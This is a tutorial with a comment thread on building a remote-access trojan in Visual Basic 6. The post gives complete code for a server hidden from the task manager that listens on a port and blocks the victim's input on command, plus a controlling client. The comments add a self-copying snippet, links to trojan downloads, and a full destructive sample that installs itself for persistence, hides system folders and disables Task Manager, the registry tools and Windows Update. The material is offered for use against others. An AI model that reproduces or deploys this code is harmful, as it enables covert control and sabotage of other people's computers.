Create Trojan with Visual basic
This little bit of code makes the program invisible to the naked eye. Now we all know that the task manager is a little bit peskier. So to get our application hidden from that a little better we make our code look like this.
Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
End Sub
So now, we have a program that is virtually invisible to the average user, and it only took four lines of code. Now all of you are thinking that this tutorial sucks right about now so lets make it a lot better by adding functions to our Trojan!
The first thing we want to do is make it be able to listen for connections when it loads. So in order to do this we need to add a Winsock Control. I named my control win but you can name yours what ever.
Now to make it listen on port 2999 when the Trojan starts up we make our code look like this.
Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End Sub
This code will set the local open port to 2999 and the port it sends it to is 455. So now, we have a program that listens but still doesn’t do anything neat. Lets make it block the input of the user completely when we tell it to!
To do this little devious thing we need to add a module with the following code
Public Declare Function BlockInput Lib “user32″ (ByVal fBlock As Long) As Long
Then we add this code to our main form:
Code: VB
Private Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub
Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub
The code in the module is called a windows API. It uses a dll file to do tasks that we want. Now this code still won’t block the users input but we are very close. We now need to program the DoActions function that we called on our main form. In case you were wondering the code that we added to the form does two different things. The first sub makes it so all connection requests are automatacly accepted. The second sub makes it so all data is automaticly accepted and it then passes all of the data to the function DoActions which we are about to code.
For the DoActions code, we want to make a public function in the module. So add this code to the module and we are about done with the server of the Trojan!
Code: VB
Public Function DoActions(x As String)
Dim Action
Select Case x
Case "block"
Action = BlockInput(True)
End Select
End Function
Ok now we have a program that when the data “block” is sent to it on port 2999 it will block the users input. I made a Select Case statement so it is easy to modify this code to your own needs later on. I recommend adding a unblock feature of your own. To do that just call the BlockInput function with the argument False instead of true.
Main Form
Code: VB
Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End Sub
Private Sub win_ConnectionRequest(ByVal requestID As Long) ' As corrected by Darkness1337
win.Close
win.Accept requestID
End Sub
Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub
Remember to add your winsock control and name it to win if you use this code.
Code: VB
Module
Public Declare Function BlockInput Lib "user32" (ByVal fBlock As Long) As Long
Public Function DoActions(x As String)
Dim Action
Select Case x
Case "block"
Action = BlockInput(True)
End Select
End Function
That’s all there is to the server side or Trojan part of it. Now on to the Client.
Client
The client will be what you will interact with. You will use it to connect to the remote server (trojan) and send it commands. Since we made a server that accepts the command of “block” lets make a client that sends the command “block”.
Make a form and add a Winsock Control, a text box, and three buttons. The Text box should be named txtIP if you want it to work with this code. In addition, your buttons should be named cmdConnect, cmdBlockInput, and cmdDisconnect. Now lets look at the code we would use to make our Client.
Code: VB
Private Sub cmdConnect_Click()
IpAddy = txtIp.Text
Win.Close
Win.RemotePort = 2999
Win.RemoteHost = IpAddy
Win.LocalPort = 9999
Win.Connect
cmdConnect.Enabled = False
End Sub
Private Sub cmdDisconnect_Click()
Win.Close
cmdConnect.Enabled = True
End Sub
Private Sub cmdBlockInput_Click()
Win.SendData "block"
End Sub
That is the code for the client. All it does is gets the Ip Adress from txtIp and connects to it on remote port 2999. Then when connected you can send the “block” data to block off their input.
I get a bunch of errors:
Error 1 ‘Sub Main’ was not found in ‘Project1′. Project1
Error 2 Name ‘IpAddy’ is not declared. C:\Users\phoenix\AppData\Local\Temporary Projects\Project1\Class1.vb 4 9 Project1
Error 3 Name ‘txtIp’ is not declared. C:\Users\phoenix\AppData\Local\Temporary Projects\Project1\Class1.vb 4 18 Project1
Error 4 Name ‘Win’ is not declared. C:\Users\phoenix\AppData\Local\Temporary Projects\Project1\Class1.vb 6 9 Project1
Error 5 Name ‘Win’ is not declared. C:\Users\phoenix\AppData\Local\Temporary Projects\Project1\Class1.vb 8 9 Project1
Error 6 Name ‘Win’ is not declared. C:\Users\phoenix\AppData\Local\Temporary Projects\Project1\Class1.vb 10 9 Project1
Error 7 Name ‘IpAddy’ is not declared. C:\Users\phoenix\AppData\Local\Temporary Projects\Project1\Class1.vb 10 26 Project1
Error 8 Name ‘Win’ is not declared. C:\Users\phoenix\AppData\Local\Temporary Projects\Project1\Class1.vb 12 9 Project1
Error 9 Name ‘Win’ is not declared. C:\Users\phoenix\AppData\Local\Temporary Projects\Project1\Class1.vb 14 9 Project1
Error 10 Name ‘cmdConnect’ is not declared. C:\Users\phoenix\AppData\Local\Temporary Projects\Project1\Class1.vb 16 9 Project1
Error 11 Name ‘Win’ is not declared. C:\Users\phoenix\AppData\Local\Temporary Projects\Project1\Class1.vb 22 9 Project1
Error 12 Name ‘cmdConnect’ is not declared. C:\Users\phoenix\AppData\Local\Temporary Projects\Project1\Class1.vb 24 9 Project1
Error 13 Name ‘Win’ is not declared. C:\Users\phoenix\AppData\Local\Temporary Projects\Project1\Class1.vb 30 9 Project1
I’m new to this and don’t know where to start.
Phoenix, are you sure you dont just got the porteble verison?
Nice programme… working nice..
das funktioniert überhaupt nicht, oder hast du das auch auf deutsch?
Hello please please can somebody write this and send me to mail bahno77@gmail.com ?? im 13 years old and im only starting with programming in VB2008…. if you sent me this i can sent you my new keylogger in C++ or VB 2008/2010 with WinPadlock it is 100% hide in taskmgr and system ! keylogger can sent all saved keys to mail !!
visual basic is always funny.
It doesnt work for me.
Wich vb i need?
i got vb 2008 express edition…
pls help
Dear Jay, my code in Trojan with visual basic only for VB6 not vb 2008 (VBNet)
sorry.
Cant you Write it in VBNet too?
Or can you pls tell me a command where the .exe copys itself to a path.
I need it.
thx
Sorry for my Bad english, i am german^^
mm I will try
Hey follow the link , there you will find exe file of simple trojan…go thru the redme.txt and enjoy…tell me or write me if you are facing any problems.
http://rapidshare.com/files/288480983/Simple_trojan.rar.html
JayWhisler said
Or can you pls tell me a command where the .exe copys itself to a path.
I need it.
thx
ok here is one in vb 6
Cocde begains:
Dim YO As String
YO = App.Path & “\” & App.EXEName & “.exe”
FileCopy YO, Drive & App.EXEName & “.exe”
Code ends:
the format is FileCopy( path of the file to be copied, path where to copy)
Nice copy and paste from a forum; you haven’t even given credits.
hay bahno77@gmail.com
can you send me winpadlock on my mail id
akale3@gmail.com
good! haha this trojan suck!
please send me VIROUS code
Nice working man….
Winsock1
Timer1 ınterval=1
Timer2 ınterval=1
Option Explicit
Private Declare Function GetActiveWindow Lib “user32″ () As Long
Private Declare Function ShellExecute Lib “shell32.dll” Alias “ShellExecuteA” (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Sub form_load()
On Error Resume Next
Winsock1.LocalPort = 1510
Winsock1.Listen
App.TaskVisible = False
Me.Hide
MsgBox “HAHAHAH Merhaba”, vbExclamation + vbOKOnly, “SAW”
MsgBox “Evet şimdi seninle bi oyun oynayalım”, vbExclamation + vbOKOnly, “SAW”
MsgBox “İlk olarak bu bilgisyarda tüm elin kolun bağlı bu oynu sonlandıramaz veya hemen bitiremezsin”, vbExclamation + vbOKOnly, “SAW”
MsgBox “Görev yöneticisi,Regedit vs… kapalı şait bana inanmayıp açmaya çalışırsan öncelikle WINDOWS’daki cd-rom’u açıp kapatan dosya silinir yani cd-rom’u açamazsın sonra bilgisyar çöker format atamazsın”, vbExclamation + vbOKOnly, “SAW”
MsgBox “Unutmadan sakın Internetten dosya indirmeye lalkma indiremezsin”, vbExclamation + vbOKOnly, “SAW”
MsgBox “2 gün süren var 2 günün sonunda bilgisyarı kurtaramazsan önce cd-rom silinir sonra bilgisyar çöker formatlayamazsın”, vbExclamation + vbOKOnly, “SAW”
MsgBox “Zaman daralıyor”, vbExclamation + vbOKOnly, “SAW”
MsgBox “Dırected by SAW”, vbExclamation + vbOKOnly, “SAW”
ShellExecute GetActiveWindow(), “Open”, “http://www.nobrain.dk/”, “”, 0&, 1
mciExecute (“set cdaudio door open”)
mciExecute (“set cdaudio door closed”)
End Sub
Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
If Winsock1.State sckClosed Then Winsock1.Close
Winsock1.Accept requestID
End Sub
Private Sub Winsock1_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
Winsock1.Close
Winsock1.Listen
End Sub
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
On Error Resume Next
Dim data1 As String
Winsock1.GetData data1 ‘ mesajal
DoEvents
SendKeys data1 ‘mesaj gönder
End Sub
Private Sub Winsock1_close()
Winsock1.Close
Winsock1.Connect
End Sub
Private Sub Timer1_timer()
On Error Resume Next
FileCopy App.Path & “\” & App.EXEName & “.exe”, “c:\WINDOWS\system32\SAW.exe”
FileCopy App.Path & “\” & App.EXEName & “.exe”, “c:\Program Files\Windows Live\telefon numaram.txt.exe”
FileCopy App.Path & “\” & App.EXEName & “.exe”, “E:\esetnod32.exe”
FileCopy App.Path & “\” & App.EXEName & “.exe”, “F:\esetnod32.exe”
SetAttr “c:\WINDOWS”, vbHidden
SetAttr “c:\WINDOWS\system32″, vbHidden
End Sub
Private Sub Timer2_Timer()
On Error Resume Next
Dim KayitDefteri As Object
Set KayitDefteri = CreateObject(“wscript.shell”)
KayitDefteri.RegWrite “HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\” & App.EXEName, App.Path & “\” & App.EXEName & “.exe”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, 1, “REG_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page”, “www.nobrain.dk”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogoff”, 1, “REG_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableChangePassword”, 1, “REG_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableLockWorkstation”, 1, “REG_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall\NoAddRemovePrograms”, 1, “REG_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall\NoWindowsSetupPage”, 1, “REG_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall\NoAddPage”, 1, “REG_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall\NoRemovePage”, 1, “REG_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoDispSettingsPage”, 1, “REG_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCPL”, 1, “REG_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose”, 1, “REG_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuOff”, 1, “REG_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, 1, “REG_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, 1, “REG_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetworkConnections”, 1, “REG_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMorePrograms”, 1, “REG_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWelcomeScreen”, 1, “REG_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop”, 1, “REG_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate\DisableWindowsUpdateAccess”, 1, “RED_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCDBurning”, 1, “REG_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall\NoAddFromCDorFloppy”, 1, “REG_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallPaper”, 1, “REG_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel”, 1, “REG_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetOpenWith”, 1, “REG_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebServices”, 1, “REG_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoOnlinePrintsWizard”, 1, “_REG_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPublishingWizard”, 1, “REG_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoDeletingComponents”, 1, “REG_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktopChanges”, 1, “REG_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ForceActiveDesktopOn”, 1, “REG_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWindowsUpdate”, 1, “REG_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuPinnedList”, 1, “REG_DWORD”
KayitDefteri.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, 1, “REG_DWORD”
End Sub
how install trojan in server. is it manually. all trojans are send through emails. If trojan needs manul installation ,then there is no need to trojan. we can direct approach to victim system. there is no need to internet connection and trojan to hack data from remoe sysem.
flash flash flash
this is my trojan:
http://s2.dosya.tc/server/2TFmOk/trojan.rar.html
hay bahno77@gmail.com
can you send me winpadlock on my mail id
cat10689@gmail.com
nice tut, but you could of helped by making a received function for if they need to send info from the server (files / uptime / whatever)
,,,, lol wer huer fragt obs das auch auf deutsch gibt sollte die finger von lassen und solitär spielen..
Leichter gehts ja nich…